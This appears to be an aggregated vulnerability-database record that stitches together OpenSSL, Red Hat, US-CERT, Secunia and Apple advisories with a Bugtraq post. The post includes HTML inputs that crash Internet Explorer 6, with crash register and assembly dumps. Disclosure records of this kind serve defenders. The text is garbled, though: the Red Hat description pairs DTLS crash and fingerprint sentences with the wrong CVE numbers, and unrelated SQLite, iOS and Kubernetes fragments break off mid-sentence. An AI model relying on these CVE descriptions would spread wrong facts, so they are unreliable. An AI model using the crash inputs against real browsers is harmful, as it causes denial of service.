OpenSSL accepts several non-DER-variations of certificate signature algorithm and signature encodings. OpenSSL also does not enforce a match between the signature algorithm between the signed and unsigned portions of the certificate. By modifying the contents of the signature algorithm or the encoding of the signature, it is possible to change the certificate's fingerprint. This does not allow an attacker to forge certificates, and does not affect certificate verification or OpenSSL servers/clients in any other way. It also does not affect common revocation mechanisms. Only custom applications that rely on the uniqueness of the fingerprint (e.g. certificate blacklists) may be affected. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. One variant of this issue was discovered by Antti Karjalainen and Tuomo Untinen from the Codenomicon CROSS program and reported to OpenSSL on 1st December 2014 by NCSC-FI Vulnerability Co-ordination. Another variant was independently reported to OpenSSL on 12th December 2014 by Konrad Kraszewski from Google. Further analysis was conducted and fixes were developed by Stephen Henson of the OpenSSL core team. Bignum squaring may produce incorrect results (CVE-2014-3570) ============================================================= Severity: Low Bignum squaring (BN_sqr) may produce incorrect results on some platforms, including x86_64. This bug occurs at random with a very low probability, and is not known to be exploitable in any way, though its exact impact is difficult to determine. The following has been determined: *) The probability of BN_sqr producing an incorrect result at random is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and 1/2^128 on affected 64-bit platforms. *) On most platforms, RSA follows a different code path and RSA operations are not affected at all. For the remaining platforms (e.g. OpenSSL built without assembly support), pre-existing countermeasures thwart bug attacks [1]. *) Static ECDH is theoretically affected: it is possible to construct elliptic curve points that would falsely appear to be on the given curve. However, there is no known computationally feasible way to construct such points with low order, and so the security of static ECDH private keys is believed to be unaffected. *) Other routines known to be theoretically affected are modular exponentiation, primality testing, DSA, RSA blinding, JPAKE and SRP. No exploits are known and straightforward bug attacks fail - either the attacker cannot control when the bug triggers, or no private key material is involved. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille (Blockstream) who also suggested an initial fix. Further analysis was conducted by the OpenSSL development team and Adam Langley of Google. The final fix was developed by Andy Polyakov of the OpenSSL core team. [1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf Note ==== As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these releases will be provided after that date. Users of these releases are advised to upgrade. References ========== URL for this Security Advisory: https://www.openssl.org/news/secadv_20150108.txt Note: the online version of the advisory may be updated with additional details over time. For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:0066-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html Issue date: 2015-01-20 Updated on: 2015-01-21 CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 ===================================================================== 1. Summary: Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 3. Description: OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library. A remote attacker could send a specially crafted DTLS message, which would cause an OpenSSL server to crash. A remote attacker could send multiple specially crafted DTLS messages to exhaust all available memory of a DTLS server. This flaw could possibly affect certain OpenSSL library functionality, such as RSA blinding. (CVE-2014-3570) It was discovered that OpenSSL would perform an ECDH key exchange with a non-ephemeral key even when the ephemeral ECDH cipher suite was selected. An attacker could use these flaws to modify an X.509 certificate to produce a certificate with a different fingerprint without invalidating its signature, and possibly bypass fingerprint-based blacklisting in applications. (CVE-2015-0205) All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to mitigate the above issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites 1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix 1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues 1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record 1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record 1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification 1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results 6. Package List: Red Hat Enterprise Linux Desktop (v. 6): Source: openssl-1.0.1e-30.el6_6.5.src.rpm i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm Red Hat Enterprise Linux Desktop Optional (v. 6): i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm Red Hat Enterprise Linux HPC Node (v. 6): Source: openssl-1.0.1e-30.el6_6.5.src.rpm x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: openssl-1.0.1e-30.el6_6.5.src.rpm i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm ppc64: openssl-1.0.1e-30.el6_6.5.ppc.rpm openssl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm s390x: openssl-1.0.1e-30.el6_6.5.s390.rpm openssl-1.0.1e-30.el6_6.5.s390x.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-devel-1.0.1e-30.el6_6.5.s390.rpm openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm ppc64: openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm s390x: openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm openssl-static-1.0.1e-30.el6_6.5.s390x.rpm x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: openssl-1.0.1e-30.el6_6.5.src.rpm i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm Red Hat Enterprise Linux Client (v. 7): Source: openssl-1.0.1e-34.el7_0.7.src.rpm x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: openssl-1.0.1e-34.el7_0.7.src.rpm x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: openssl-1.0.1e-34.el7_0.7.src.rpm ppc64: openssl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm s390x: openssl-1.0.1e-34.el7_0.7.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-devel-1.0.1e-34.el7_0.7.s390.rpm openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm openssl-libs-1.0.1e-34.el7_0.7.s390.rpm openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-static-1.0.1e-34.el7_0.7.ppc.rpm openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm s390x: openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm openssl-static-1.0.1e-34.el7_0.7.s390.rpm openssl-static-1.0.1e-34.el7_0.7.s390x.rpm x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: openssl-1.0.1e-34.el7_0.7.src.rpm x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2014-3570 https://access.redhat.com/security/cve/CVE-2014-3571 https://access.redhat.com/security/cve/CVE-2014-3572 https://access.redhat.com/security/cve/CVE-2014-8275 https://access.redhat.com/security/cve/CVE-2015-0204 https://access.redhat.com/security/cve/CVE-2015-0205 https://access.redhat.com/security/cve/CVE-2015-0206 https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20150108.txt 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X ENFobdxQdJ+gVAiRe8Qf54A= =wyAg -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
var-200604-0201 Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-101A Microsoft Windows and Internet Explorer Vulnerabilities Original release date: April 11, 2006 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows * Microsoft Internet Explorer For more complete information, refer to the Microsoft Security Bulletin Summary for April 2006. I. (CVE-2006-0012) II. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. An attacker may also be able to cause a denial of service. III. Solution Apply Updates Microsoft has provided updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site. Workarounds Please see the US-CERT Vulnerability Notes for workarounds. Many of these vulnerabilities can be mitigated by following the instructions listed in the Securing Your Web Browser document. Appendix A. Please send email to <cert@cert.org> with "TA06-101A Feedback VU#876678" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History Apr 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt Cg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+ olQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM i+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I R+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh HAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA== =w6IC -----END PGP SIGNATURE----- . Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information. o Memory Corruption Vulnerability: <mshtml.dll>#7d519030 ================================= Following HTML code forces IE 6 to crash: > <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" > "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> > <html> <fieldset> <h4> > <pre><td> > <menu> > <legend> > <a> > <ul> > <small> > <fieldset> > <h6> > </h6 > </u> > </optgroup> > </tr> > </map> > </ul > </dfn> > > </del> > </h2> > </dir> > </ul> Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html These are the register values and the ASM dump at the time of the access violation: > eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 > edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894 > > 7d519012 55 push ebp > 7d519013 8bec mov ebp,esp > 7d519015 8b4104 mov eax,[ecx+0x4] > 7d519018 394508 cmp [ebp+0x8],eax > 7d51901b 7c09 jl mshtml+0x69026 (7d519026) > 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb) > 7d51901f 33c0 xor eax,eax > 7d519021 40 inc eax > 7d519022 5d pop ebp > 7d519023 c20800 ret 0x8 > 7d519026 83c8ff or eax,0xffffffff > 7d519029 ebf7 jmp mshtml+0x69022 (7d519022) > 7d51902b 90 nop > 7d51902c 90 nop > 7d51902d 90 nop > 7d51902e 90 nop > 7d51902f 90 nop > FAULT ->7d519030 8b4108 mov eax,[ecx+0x8] > ds:0023:00000008=???????? > 7d519033 85c0 test eax,eax > 7d519035 7425 jz mshtml+0x6905c (7d51905c) > 7d519037 8b10 mov edx,[eax] > 7d519039 f6c210 test dl,0x10 > 7d51903c 7408 jz mshtml+0x69046 (7d519046) > 7d51903e f6c220 test dl,0x20 > 7d519041 7519 jnz mshtml+0x6905c (7d51905c) > 7d519043 8b400c mov eax,[eax+0xc] > 7d519046 8b4808 mov ecx,[eax+0x8] > 7d519049 85c9 test ecx,ecx o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35 ================================= Following HTML code forces IE 6 to crash: > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > "http://www.w3.org/TR/html4/loose.dtd"> > <bdo> > </span> > <pre> > > <param> > <form> > <colgroup> > <small> > </small> > </colgroup> > </map> > </button> > </code > > <blockquote> > <th> > <small> > > </tbody> > </tr> > </ol> > </tbody> > </ol> > </code> > </strong> > > > <head> > <fieldset> > <style> > > </style > </dir> > </a> > </td > </li> > </label > </object> > </bdo > </th > </object > </q> > > <ol> > <object> Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html These are the register values and the ASM dump at the time of the access violation: > eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 > edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778 > > 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424) > 7d529d13 85c0 test eax,eax > 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2 > (7d5aede0) > 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8] > 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80] > 7d529d26 5e pop esi > 7d529d27 5d pop ebp > 7d529d28 c20c00 ret 0xc > 7d529d2b 90 nop > 7d529d2c 90 nop > 7d529d2d 90 nop > 7d529d2e 90 nop > 7d529d2f 90 nop > 7d529d30 8bff mov edi,edi > 7d529d32 55 push ebp > 7d529d33 8bec mov ebp,esp > FAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14] > ds:0023:00000014=?? > 7d529d39 c1e004 shl eax,0x4 > 7d529d3c 0578aa4b7d add eax,0x7d4baa78 > 7d529d41 7410 jz mshtml+0x79d53 (7d529d53) > 7d529d43 8b400c mov eax,[eax+0xc] > 7d529d46 234508 and eax,[ebp+0x8] > 7d529d49 f7d8 neg eax > 7d529d4b 1bc0 sbb eax,eax > 7d529d4d f7d8 neg eax > 7d529d4f 5d pop ebp > 7d529d50 c20400 ret 0x4 > 7d529d53 33c0 xor eax,eax > 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f) o Vulnerable versions: ===================== The DoS vulnerability was successfully tested on: > MS IE 6 SP2 - Win XP Pro SP2 > MS IE 6 - Win 2k SP4 o Disclosure Timeline: ===================== xx Feb 06 - Vulnerabilities discovered. 08 Mar 06 - Vendor contacted. 22 Mar 06 - Vendor confirmed vulnerabilities. 25 May 06 - Public release. o Solution: ========== Install the latest security update (MS06-013) for Internet Explorer [2]. o Credits: ========= Thomas Waldegger <bugtraq@morph3us.org> BuHa-Security Community - http://buha.info/board/ If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq@morph3us.org' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me. Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa. ---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/ ---------------------------------------------------------------------- TITLE: Microsoft Design Tools msdds.dll Code Execution Vulnerability SECUNIA ADVISORY ID: SA16480 VERIFY ADVISORY: http://secunia.com/advisories/16480/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: Microsoft Visual Studio .NET 2003 http://secunia.com/product/1086/ Microsoft Office 2003 Student and Teacher Edition http://secunia.com/product/2278/ Microsoft Office 2003 Standard Edition http://secunia.com/product/2275/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/ Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 6.x http://secunia.com/product/11/ Microsoft Office 2003 Professional Edition http://secunia.com/product/2276/ Microsoft Office 2003 Small Business Edition http://secunia.com/product/2277/ DESCRIPTION: A vulnerability has been reported in Microsoft Visual Studio .NET, which potentially can be exploited by malicious people to compromise a vulnerable system. The COM object is known to be installed as part of the following products: * Microsoft Visual Studio .NET 2003 * Microsoft Office Professional 2003 Other products may also include the affected COM object. NOTE: An exploit has been published. However, there are currently conflicting reports about the exploitability of this issue. Some reports confirm that code execution is possible, while other reports indicate that the problem can't be reproduced. Secunia has currently not been able to reproduce the vulnerability in version 7.10.3077.0 of the COM object. This advisory will be updated when more information is available. SOLUTION: Restrict use of ActiveX controls to trusted web sites only. PROVIDED AND/OR DISCOVERED BY: Reported by anonymous person. ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
var-202006-0946 In SQLite before 3.32.3, select.c mishandles query-flattener optimization, leading to a multiSelectOrderBy heap overflow because of misuse of transitive properties for constant propagation. SQLite Is vulnerable to out-of-bounds writes.Service operation interruption (DoS) It may be put into a state. SQLite is an open source embedded relational database management system based on C language developed by American D.Richard Hipp software developer. The system has the characteristics of independence, isolation and cross-platform. multiSelectOrderBy in versions prior to SQLite 3.32.3 has a buffer error vulnerability. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. CVE-2020-9976: Rias A. Murdoch (@SJMurdoch) of OneSpan's Innovation Centre (onespan.com) and University College London, Jack Cable of Lightning Security, Ryan Pickren (ryanpickren.com), Yair Amit for their assistance. Entry added November 12, 2020 Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 14.0 and iPadOS 14.0". Description: Red Hat Advanced Cluster Management for Kubernetes 2.2.4 images Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release: https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana gement_for_kubernetes/2.2/html/release_notes/ Security fixes: * redisgraph-tls: redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309) * console-header-container: nodejs-netmask: improper input validation of octal input data (CVE-2021-28092) * console-container: nodejs-is-svg: ReDoS via malicious string (CVE-2021-28918) Bug fixes: * RHACM 2.2.4 images (BZ# 1957254) * Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 (BZ#1950832) * ACM Operator should support using the default route TLS (BZ# 1955270) * The scrolling bar for search filter does not work properly (BZ# 1956852) * Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426) * The proxy setup in install-config.yaml is not worked when IPI installing with RHACM (BZ# 1960181) * Unable to make SSH connection to a Bitbucket server (BZ# 1966513) * Observability Thanos store shard crashing - cannot unmarshall DNS message (BZ# 